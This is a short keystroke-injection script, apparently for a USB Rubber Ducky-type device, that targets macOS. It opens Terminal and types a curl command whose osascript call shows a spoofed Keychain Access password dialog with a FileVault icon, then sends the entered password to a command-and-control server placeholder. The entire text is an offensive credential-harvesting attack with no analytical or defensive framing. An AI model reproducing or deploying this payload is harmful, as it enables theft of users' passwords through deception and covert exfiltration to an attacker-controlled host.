REM Display a fake password prompt to harvest credentials and send to a C2 Server
DELAY 2000
GUI space
DELAY 500
STRING terminal
ENTER
DELAY 1000
STRING "curl -s --data 'echo "$(osascript -e 'set popup to display dialog "Keychain Access wants to use the login keychain" & return & return & "Please enter the keychain password" & return default answer "" with icon file "System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:FileVaultIcon.icns" with title "Authentication Needed" with hidden answer')' <C2-Server>"
ENTER
ENTER
GUI q
